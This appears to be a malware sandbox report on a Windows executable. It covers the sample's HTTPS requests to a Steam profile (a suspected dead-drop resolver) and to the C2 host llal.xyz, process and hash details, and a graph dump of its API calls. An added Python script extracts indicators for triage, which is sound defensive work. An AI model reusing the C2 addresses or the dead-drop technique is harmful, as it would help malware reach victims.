                                                                                                                                                                                          2025-01-01 08:12:05 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                                                                                                                                          Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                                                                                                                          2025-01-01 08:12:05 UTC3768INData Raw: 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75
                                                                                                                                                                                          Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actu
                                                                                                                                                                                          2025-01-01 08:12:05 UTC506INData Raw: 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09
                                                                                                                                                                                          Data Ascii: >Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link">


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49705        188.114.96.3    443               4396  C:\Users\user\Desktop\OXoeX1Ii3x.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-01 08:12:06 UTC  210                OUT        GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1
User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
Host: llal.xyz
Cache-Control: no-cache
2025-01-01 08:12:06 UTC  946                IN         HTTP/1.1 521
                                                                                                                                                                                          Date: Wed, 01 Jan 2025 08:12:06 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                          Content-Length: 15
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5L%2F8EUocKkYvuuHYJI1naz0ocR%2F8KyZzOBWB6DWzypfu6hhxMbKw28dJU1olwWMVT%2BWJq%2FnGSM7NgOEtsxrrSUT14GB6O6Tavp7EwmoWVJXi3TaE9YmPkOv4eA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Referrer-Policy: same-origin
                                                                                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8fb10adb4b8a41c1-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1641&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=848&delivery_rate=1699650&cwnd=205&unsent_bytes=0&cid=440ab95d55b28f4b&ts=226&x=0"
2025-01-01 08:12:06 UTC  15                 IN         Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
Data Ascii: error code: 521
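The two HTTP sessions above, read together with the DNS answers, give a triager a handful of checks worth automating. The Python below is an added example; it is not part of the Joe Sandbox report and not code from the sample. It re-enters the two request heads, the response status codes and the DNS answers from this report as constructed input, then flags what a practitioner would act on: a Windows process sending a hard-coded Linux browser User-Agent, that same User-Agent reused against both hosts, a Steam profile page pulled by a non-browser process (a dead-drop-resolver hypothesis of mine, not something the report asserts), and the Cloudflare 521 reply. That status means the Cloudflare edge accepted the TLS connection but the origin behind it refused, so whatever the sample would have exchanged with llal.xyz was not observed in this run and the report's network behaviour should be treated as incomplete. The browser-image list, the data structures and the reason strings are my own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed input: the DNS answers and the two HTTP sessions from this report,
# transcribed by hand so the script runs offline. Response bodies are omitted;
# only the fields the checks need are kept.
DNS_ANSWERS = {
    "steamcommunity.com": ["104.102.49.254"],
    "llal.xyz": ["188.114.96.3", "188.114.97.3"],
}

UA = ("Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) "
      "Chrome/50.0.2598.249 Safari/603")

@dataclass
class HttpSession:
    session_id: int
    process: str            # image path of the client, from the session table
    dst_ip: str
    dst_port: int
    request: str            # request line plus headers, as captured
    status: int
    response_headers: dict

SESSIONS = [
    HttpSession(0, r"C:\Users\user\Desktop\OXoeX1Ii3x.exe", "104.102.49.254", 443,
                "GET /profiles/76561199619938930 HTTP/1.1\r\n"
                "User-Agent: " + UA + "\r\nHost: steamcommunity.com\r\nCache-Control: no-cache\r\n",
                200, {"Server": "nginx", "Content-Length": "35137"}),
    HttpSession(1, r"C:\Users\user\Desktop\OXoeX1Ii3x.exe", "188.114.96.3", 443,
                "GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1\r\n"
                "User-Agent: " + UA + "\r\nHost: llal.xyz\r\nCache-Control: no-cache\r\n",
                521, {"Server": "cloudflare", "Content-Length": "15"}),
]

# Assumed list of legitimate browser images; anything else fetching web pages
# with a browser User-Agent is treated as suspicious.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")

def parse_request(raw):
    """Split a captured request head into (method, path, {lowercased header name: value})."""
    lines = [l for l in raw.replace("\r\n", "\n").split("\n") if l]
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("bad request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group("method"), m.group("path"), headers

def find_anomalies(sessions):
    """Triage heuristics for this report's traffic; returns (session_id, reason) pairs."""
    hits, hosts_per_ua = [], {}
    for s in sessions:
        _, path, hdr = parse_request(s.request)
        ua, host = hdr.get("user-agent", ""), hdr.get("host", "")
        image = s.process.rsplit("\\", 1)[-1].lower()
        # A Windows image (path under C:\) announcing itself as a Linux browser.
        if s.process.lower().startswith("c:\\") and "linux" in ua.lower():
            hits.append((s.session_id, "Linux browser User-Agent sent by a Windows process"))
        hosts_per_ua.setdefault(ua, set()).add(host)
        # Public profile page pulled by a non-browser: consistent with a dead-drop
        # resolver, where the next C2 host is parsed out of the profile text.
        if host == "steamcommunity.com" and path.startswith("/profiles/") and image not in BROWSERS:
            hits.append((s.session_id, "Steam profile fetched by non-browser process (possible dead-drop resolver)"))
        # Cloudflare 521: the edge answered but the origin refused the connection, so
        # the sample's exchange with this host was not observed in the sandbox run.
        if s.status == 521 and s.response_headers.get("Server", "").lower() == "cloudflare":
            hits.append((s.session_id, "Cloudflare 521: origin down, C2 exchange not observed"))
    for ua, hosts in hosts_per_ua.items():
        if len(hosts) > 1:
            hits.append((None, "identical hard-coded User-Agent reused across %d hosts" % len(hosts)))
    return hits

def extract_iocs(sessions, dns_answers):
    """Domains, resolved and contacted IPs, and full URLs, ready for a blocklist or hunt query."""
    iocs = {"domains": set(), "ips": set(), "urls": set()}
    for s in sessions:
        _, path, hdr = parse_request(s.request)
        host = hdr.get("host")
        if host:
            scheme = "https" if s.dst_port == 443 else "http"
            iocs["domains"].add(host)
            iocs["urls"].add("%s://%s%s" % (scheme, host, path))
            iocs["ips"].update(dns_answers.get(host, []))
        iocs["ips"].add(s.dst_ip)
    return iocs

if __name__ == "__main__":
    for sid, reason in find_anomalies(SESSIONS):
        print("session %s: %s" % (sid, reason))
    for kind, values in extract_iocs(SESSIONS, DNS_ANSWERS).items():
        print("%s: %s" % (kind, ", ".join(sorted(values))))
```

The User-Agent check is the cheapest of these to turn into a proxy or EDR rule, because a Windows host has no legitimate reason to emit a Linux browser string; the dead-drop check is a hypothesis to confirm by inspecting what the sample parses out of the profile HTML, and the 521 check is a reminder that both llal.xyz addresses (188.114.96.3 and 188.114.97.3) sit in front of a Cloudflare edge, so the real C2 origin is not in this report.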



Target ID: 0
Start time: 03:12:03
Start date: 01/01/2025
Path: C:\Users\user\Desktop\OXoeX1Ii3x.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\OXoeX1Ii3x.exe"
Imagebase: 0x200000
File size: 378'368 bytes
MD5 hash: 3E9881B9C6FF4994FC9D684456694E77
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 03:12:07
Start date: 01/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
Imagebase: 0x70000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 4.7%
Total number of Nodes: 727
Total number of Limit Nodes: 4

[Execution graph: serialized node/edge dump of the interactive graph on the original page, truncated here. Entry node at 0x20f791; runtime symbols visible along the edges include std::ios_base::_Init, __EH_prolog3, __EH_prolog3_GS, Concurrency::cancel_current_task, KiUserExceptionDispatcher, std::_Facet_Register, RtlAllocateHeap, EnterCriticalSection/LeaveCriticalSection, __dosmaperr, std::bad_exception and _com_util::ConvertBSTRToString.]
34133->34134 34134->33991 34135->33996 34136->33995 34137->34006 34138->34129 34140 205f13 __EH_prolog3 34139->34140 34141 20a85f std::ios_base::_Init 41 API calls 34140->34141 34142 205f26 std::ios_base::_Init 34141->34142 34142->34013 34144 205fc5 __EH_prolog3 34143->34144 34191 205d26 34144->34191 34147 205d26 41 API calls 34148 205ff6 34147->34148 34197 20a756 34148->34197 34151 20ad83 std::ios_base::_Init 41 API calls 34152 20603b 34151->34152 34153 20a805 41 API calls 34152->34153 34154 206043 34153->34154 34155 20ad83 std::ios_base::_Init 41 API calls 34154->34155 34156 206051 34155->34156 34157 20a805 41 API calls 34156->34157 34158 206059 34157->34158 34159 20ac78 std::ios_base::_Init 39 API calls 34158->34159 34160 20607c 34159->34160 34161 20ac78 std::ios_base::_Init 39 API calls 34160->34161 34162 206088 std::ios_base::_Init 34161->34162 34162->34015 34164 205ebf __EH_prolog3 34163->34164 34209 205cc0 34164->34209 34168 205eed 34169 20ac78 std::ios_base::_Init 39 API calls 34168->34169 34170 205eff std::ios_base::_Init 34169->34170 34170->34019 34172 20e399 __EH_prolog3 34171->34172 34173 20a756 41 API calls 34172->34173 34174 20e3e8 34173->34174 34175 20a805 41 API calls 34174->34175 34176 20e3f3 34175->34176 34177 20a7e4 41 API calls 34176->34177 34178 20e400 34177->34178 34179 20a805 41 API calls 34178->34179 34180 20e40b 34179->34180 34181 20a7e4 41 API calls 34180->34181 34182 20e417 34181->34182 34183 20a805 41 API calls 34182->34183 34184 20e41f 34183->34184 34185 20a805 41 API calls 34184->34185 34186 20e427 std::ios_base::_Init 34185->34186 34186->34021 34188 205e78 __EH_prolog3 34187->34188 34238 205d86 34188->34238 34190 205ea5 std::ios_base::_Init 34190->34031 34192 205d32 __EH_prolog3_GS 34191->34192 34204 20e073 34192->34204 34195 23fc49 5 API calls 34196 205d7a 34195->34196 34196->34147 34198 20a768 34197->34198 34203 20602d 34197->34203 34199 20a783 _Yarn 34198->34199 34200 20a76f 34198->34200 34198->34203 34202 20be69 
std::ios_base::_Init 39 API calls 34199->34202 34199->34203 34208 20baf1 41 API calls 2 library calls 34200->34208 34202->34203 34203->34151 34205 205d5a 34204->34205 34206 20e09d 34204->34206 34205->34195 34207 20bb7d std::ios_base::_Init 41 API calls 34206->34207 34207->34205 34208->34203 34210 205ccc __EH_prolog3_GS 34209->34210 34211 20e073 41 API calls 34210->34211 34212 205d05 34211->34212 34213 23fc49 5 API calls 34212->34213 34214 205d25 34213->34214 34215 20b324 34214->34215 34216 20b330 __EH_prolog3 34215->34216 34217 20a756 41 API calls 34216->34217 34218 20b374 34217->34218 34229 20a7e4 34218->34229 34221 20a805 41 API calls 34222 20b388 34221->34222 34233 20ac9e 34222->34233 34225 20a805 41 API calls 34226 20b39e 34225->34226 34227 20a7e4 41 API calls 34226->34227 34228 20b3aa std::ios_base::_Init 34227->34228 34228->34168 34230 20a7ee 34229->34230 34230->34230 34231 20ad83 std::ios_base::_Init 41 API calls 34230->34231 34232 20a800 34231->34232 34232->34221 34234 20acc5 34233->34234 34235 20acaa 34233->34235 34237 20bc57 41 API calls 2 library calls 34234->34237 34235->34225 34237->34235 34239 205d92 __EH_prolog3 34238->34239 34242 2058bc 34239->34242 34241 205d9f std::ios_base::_Init 34241->34190 34247 22006f 34242->34247 34246 205925 34246->34241 34248 22007c 34247->34248 34254 20590b 34247->34254 34249 225bb8 _Yarn 15 API calls 34248->34249 34248->34254 34250 220099 34249->34250 34251 2200a9 34250->34251 34265 224a96 39 API calls 2 library calls 34250->34265 34262 224f2e 34251->34262 34255 21ca60 34254->34255 34256 21ca69 IsProcessorFeaturePresent 34255->34256 34257 21ca68 34255->34257 34259 21caab 34256->34259 34257->34246 34273 21ca6e SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 34259->34273 34261 21cb8e 34261->34246 34266 2302fe 34262->34266 34265->34251 34267 224f46 34266->34267 34268 230309 RtlFreeHeap 34266->34268 34267->34254 34268->34267 34269 23031e GetLastError 34268->34269 34270 23032b 
__dosmaperr 34269->34270 34272 224eb3 14 API calls __dosmaperr 34270->34272 34272->34267 34273->34261 34274->34037 34278 20a930 34275->34278 34283 205930 34278->34283 34284 22006f ___std_exception_copy 40 API calls 34283->34284 34285 205972 34284->34285 34286 205dc0 34285->34286 34287 205930 std::bad_exception::bad_exception 40 API calls 34286->34287 34288 205df1 34287->34288 34288->34049 34289->34058 34290 21d012 34291 21d01e __FrameHandler3::FrameUnwindToState 34290->34291 34316 21cd11 34291->34316 34293 21d025 34294 21d17e 34293->34294 34304 21d04f ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 34293->34304 34476 21d3d0 4 API calls 2 library calls 34294->34476 34296 21d185 34477 22c26b 21 API calls __FrameHandler3::FrameUnwindToState 34296->34477 34298 21d18b 34478 22c22f 21 API calls __FrameHandler3::FrameUnwindToState 34298->34478 34300 21d193 34301 21d06e 34302 21d0ef 34324 22ca57 34302->34324 34304->34301 34304->34302 34475 22c245 39 API calls 3 library calls 34304->34475 34306 21d0f5 34328 217be1 34306->34328 34317 21cd1a 34316->34317 34479 21d1df IsProcessorFeaturePresent 34317->34479 34319 21cd26 34480 22011c 10 API calls 2 library calls 34319->34480 34321 21cd2b 34322 21cd2f 34321->34322 34481 22013b 7 API calls 2 library calls 34321->34481 34322->34293 34325 22ca60 34324->34325 34326 22ca65 34324->34326 34482 22c58c 53 API calls 34325->34482 34326->34306 34329 217bf0 __EH_prolog3_GS 34328->34329 34483 217aaa 34329->34483 34333 217c0a 34334 20a85f std::ios_base::_Init 41 API calls 34333->34334 34335 217c26 34334->34335 34495 2061c0 34335->34495 34337 20a85f std::ios_base::_Init 41 API calls 34361 217e86 34337->34361 34338 2173cd 50 API calls 34370 217c47 34338->34370 34339 217f5e 34520 21b11a 34339->34520 34341 217f6e 34527 20a898 34341->34527 34342 20e073 41 API calls 34342->34370 34348 217f9d 34539 20b558 34348->34539 34350 216884 41 API calls 34350->34370 34352 217fcb 34575 21840e 41 API calls 
34352->34575 34354 217fda FindWindowA 34576 20b3e8 41 API calls 2 library calls 34354->34576 34356 217ffc 34577 20b3e8 41 API calls 2 library calls 34356->34577 34358 218007 34578 20b3e8 41 API calls 2 library calls 34358->34578 34359 20e073 41 API calls 34359->34361 34361->34339 34361->34359 34363 2186f4 39 API calls 34361->34363 34550 20b4ba 41 API calls 2 library calls 34361->34550 34551 20b614 41 API calls 2 library calls 34361->34551 34552 2173cd 34361->34552 34362 218020 34579 20a568 41 API calls 2 library calls 34362->34579 34363->34361 34365 218028 34580 20b3e8 41 API calls 2 library calls 34365->34580 34366 217e63 34366->34337 34368 20a85f std::ios_base::_Init 41 API calls 34368->34370 34369 218044 34581 20a568 41 API calls 2 library calls 34369->34581 34370->34338 34370->34342 34370->34350 34370->34366 34370->34368 34390 2186f4 39 API calls 34370->34390 34398 217b46 41 API calls 34370->34398 34405 21b11a 44 API calls 34370->34405 34549 2186bf 39 API calls 34370->34549 34372 21804c 34582 215726 41 API calls 2 library calls 34372->34582 34375 21805c 34583 215040 95 API calls 4 library calls 34375->34583 34377 218064 34584 20a568 41 API calls 2 library calls 34377->34584 34379 21808f 34585 21ad7e 41 API calls 2 library calls 34379->34585 34381 2180a3 34382 218269 34381->34382 34586 20b3e8 41 API calls 2 library calls 34381->34586 34610 20a568 41 API calls 2 library calls 34382->34610 34385 21828a 34611 21ad7e 41 API calls 2 library calls 34385->34611 34386 2180cf 34587 20a568 41 API calls 2 library calls 34386->34587 34389 2180d7 34588 21ad7e 41 API calls 2 library calls 34389->34588 34390->34370 34391 21829e 34393 2183a5 34391->34393 34612 20b3e8 41 API calls 2 library calls 34391->34612 34626 20a568 41 API calls 2 library calls 34393->34626 34396 2183c1 34627 21ad7e 41 API calls 2 library calls 34396->34627 34397 2182c5 34613 20a568 41 API calls 2 library calls 34397->34613 34398->34370 34401 2180eb 34401->34382 34589 20b3e8 41 API calls 2 library calls 
34401->34589 34402 2183d5 34406 218405 ExitProcess 34402->34406 34628 20b3e8 41 API calls 2 library calls 34402->34628 34403 2182cd 34614 21ad7e 41 API calls 2 library calls 34403->34614 34405->34370 34408 21810b 34590 20b3e8 41 API calls 2 library calls 34408->34590 34411 2183f0 34629 20a568 41 API calls 2 library calls 34411->34629 34412 218116 34591 20b3e8 41 API calls 2 library calls 34412->34591 34415 2183f8 34630 2176ce 57 API calls 3 library calls 34415->34630 34416 2182e1 34416->34393 34615 20b3e8 41 API calls 2 library calls 34416->34615 34418 218126 34592 20b3e8 41 API calls 2 library calls 34418->34592 34420 218301 34616 20b3e8 41 API calls 2 library calls 34420->34616 34423 218135 34593 20b3e8 41 API calls 2 library calls 34423->34593 34424 21830c 34617 20b3e8 41 API calls 2 library calls 34424->34617 34426 218152 34594 20a568 41 API calls 2 library calls 34426->34594 34429 218325 34618 20a568 41 API calls 2 library calls 34429->34618 34430 21815a 34595 20b3e8 41 API calls 2 library calls 34430->34595 34433 21832d 34619 20b3e8 41 API calls 2 library calls 34433->34619 34434 218176 34596 20a568 41 API calls 2 library calls 34434->34596 34437 218348 34620 20a568 41 API calls 2 library calls 34437->34620 34438 21817e 34597 20b3e8 41 API calls 2 library calls 34438->34597 34441 218350 34621 20b3e8 41 API calls 2 library calls 34441->34621 34442 21819d 34598 20a568 41 API calls 2 library calls 34442->34598 34445 21836c 34622 20a568 41 API calls 2 library calls 34445->34622 34446 2181a5 34599 20b3e8 41 API calls 2 library calls 34446->34599 34449 218374 34623 2197dc 48 API calls 2 library calls 34449->34623 34451 2181c4 34600 20a568 41 API calls 2 library calls 34451->34600 34452 218387 34624 21960c 128 API calls __EH_prolog3_GS 34452->34624 34455 2181cc 34601 20b3e8 41 API calls 2 library calls 34455->34601 34456 218396 34625 2185fd 41 API calls 34456->34625 34458 2181e8 34602 20a568 41 API calls 2 library calls 34458->34602 34461 2181f0 34603 20b3e8 41 API 
calls 2 library calls 34461->34603 34463 21820c 34604 20a568 41 API calls 2 library calls 34463->34604 34465 218214 34605 20b3e8 41 API calls 2 library calls 34465->34605 34467 218230 34606 20a568 41 API calls 2 library calls 34467->34606 34469 218238 34607 209fc4 48 API calls 2 library calls 34469->34607 34471 21824b 34608 209a90 168 API calls 2 library calls 34471->34608 34473 21825a 34609 2184e1 41 API calls 34473->34609 34475->34302 34476->34296 34477->34298 34478->34300 34479->34319 34480->34321 34481->34322 34482->34326 34484 217ab6 __EH_prolog3_GS 34483->34484 34631 21da56 34484->34631 34486 217ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34487 20e073 41 API calls 34486->34487 34488 217b15 34487->34488 34489 23fc49 5 API calls 34488->34489 34490 217b45 34489->34490 34491 2186f4 34490->34491 34492 218706 34491->34492 34493 2186ff 34491->34493 34492->34333 34494 20ac78 std::ios_base::_Init 39 API calls 34493->34494 34494->34492 34496 2061cc __EH_prolog3_GS 34495->34496 34497 20a898 std::ios_base::_Init 41 API calls 34496->34497 34498 2061d9 34497->34498 34639 21c2b7 34498->34639 34501 20a85f std::ios_base::_Init 41 API calls 34502 2061fc 34501->34502 34651 21c0f0 34502->34651 34505 20a85f std::ios_base::_Init 41 API calls 34506 20622e 34505->34506 34507 21c0f0 44 API calls 34506->34507 34508 20623b 34507->34508 34509 20a85f std::ios_base::_Init 41 API calls 34508->34509 34510 206250 34509->34510 34511 21c0f0 44 API calls 34510->34511 34512 20625d 34511->34512 34513 20a85f std::ios_base::_Init 41 API calls 34512->34513 34514 206272 34513->34514 34515 21c0f0 44 API calls 34514->34515 34516 20627f InternetOpenA 34515->34516 34518 23fc49 5 API calls 34516->34518 34519 2062ad 34518->34519 34519->34370 34521 21b126 __EH_prolog3 34520->34521 34522 21b2a0 std::ios_base::_Init 34521->34522 34524 21b243 34521->34524 34526 20ac9e 41 API calls 34521->34526 34679 22b9f0 42 API calls 3 library calls 34521->34679 34522->34341 34524->34522 34525 20ac9e 41 API calls 
34524->34525 34525->34524 34526->34521 34528 20a8bb 34527->34528 34680 20bbf3 34528->34680 34530 20a8c6 34531 21b2ab 34530->34531 34532 21b2b7 __EH_prolog3 34531->34532 34533 20a85f std::ios_base::_Init 41 API calls 34532->34533 34538 21b2e4 34533->34538 34534 21b31f 34536 20ac78 std::ios_base::_Init 39 API calls 34534->34536 34535 20ac9e 41 API calls 34535->34538 34537 21b32b std::ios_base::_Init 34536->34537 34537->34348 34538->34534 34538->34535 34540 20b567 __EH_prolog3 34539->34540 34688 20b07f 34540->34688 34542 20b598 34711 20e0d4 34542->34711 34544 20b5de 34717 20c1b8 34544->34717 34548 20b600 std::ios_base::_Init _Func_class 34548->34352 34549->34370 34550->34361 34551->34361 34553 2173e8 ___scrt_uninitialize_crt 34552->34553 34554 21c2b7 47 API calls 34553->34554 34555 21742e 34554->34555 34556 20a85f std::ios_base::_Init 41 API calls 34555->34556 34557 217445 34556->34557 34558 21c0f0 44 API calls 34557->34558 34559 217456 34558->34559 34560 20a85f std::ios_base::_Init 41 API calls 34559->34560 34561 21747e 34560->34561 34562 21c0f0 44 API calls 34561->34562 34563 21748f 34562->34563 34564 20a85f std::ios_base::_Init 41 API calls 34563->34564 34565 2174a7 34564->34565 34566 21c0f0 44 API calls 34565->34566 34567 2174b8 InternetOpenUrlA 34566->34567 34569 2175d1 34567->34569 34571 217571 34567->34571 34572 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34569->34572 34570 217590 InternetReadFile 34570->34569 34570->34571 34571->34569 34571->34570 34899 217870 34571->34899 34573 2175ff 34572->34573 34573->34361 34575->34354 34576->34356 34577->34358 34578->34362 34579->34365 34580->34369 34581->34372 34582->34375 34583->34377 34584->34379 34585->34381 34586->34386 34587->34389 34588->34401 34589->34408 34590->34412 34591->34418 34592->34423 34593->34426 34594->34430 34595->34434 34596->34438 34597->34442 34598->34446 34599->34451 34600->34455 34601->34458 34602->34461 34603->34463 34604->34465 34605->34467 34606->34469 
34607->34471 34608->34473 34609->34382 34610->34385 34611->34391 34612->34397 34613->34403 34614->34416 34615->34420 34616->34424 34617->34429 34618->34433 34619->34437 34620->34441 34621->34445 34622->34449 34623->34452 34624->34456 34625->34393 34626->34396 34627->34402 34628->34411 34629->34415 34630->34406 34634 21f815 34631->34634 34635 21f851 GetSystemTimeAsFileTime 34634->34635 34636 21f845 GetSystemTimePreciseAsFileTime 34634->34636 34637 21da64 34635->34637 34636->34637 34637->34486 34670 23fc9a 34639->34670 34641 21c2c6 GetPEB 34646 21c2e5 ctype 34641->34646 34650 21c3c5 34641->34650 34642 23fc49 5 API calls 34643 2061e8 34642->34643 34643->34501 34645 224a96 39 API calls ___std_exception_copy 34645->34646 34646->34645 34647 22bd0a 43 API calls 34646->34647 34648 20a85f 41 API calls std::ios_base::_Init 34646->34648 34649 20ac78 39 API calls std::ios_base::_Init 34646->34649 34646->34650 34671 21c272 WideCharToMultiByte 34646->34671 34647->34646 34648->34646 34649->34646 34650->34642 34652 21c0fc __EH_prolog3_catch_GS 34651->34652 34653 21c107 34652->34653 34668 21c11a 34652->34668 34654 20ac78 std::ios_base::_Init 39 API calls 34653->34654 34655 21c113 34654->34655 34672 23fc58 34655->34672 34656 21c210 34658 20ac78 std::ios_base::_Init 39 API calls 34656->34658 34658->34655 34661 206209 34661->34505 34662 21c25d 34677 21d9ca 41 API calls 2 library calls 34662->34677 34663 21c267 34678 21da0a 41 API calls 2 library calls 34663->34678 34666 20a85f std::ios_base::_Init 41 API calls 34666->34668 34668->34656 34668->34662 34668->34663 34668->34666 34669 20ac78 std::ios_base::_Init 39 API calls 34668->34669 34675 224eb3 14 API calls __dosmaperr 34668->34675 34676 229b67 42 API calls _Fputc 34668->34676 34669->34668 34670->34641 34671->34646 34673 21ca60 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 34672->34673 34674 23fc62 34673->34674 34674->34674 34675->34668 34676->34668 34679->34521 34681 20bc51 34680->34681 34685 20bc07 
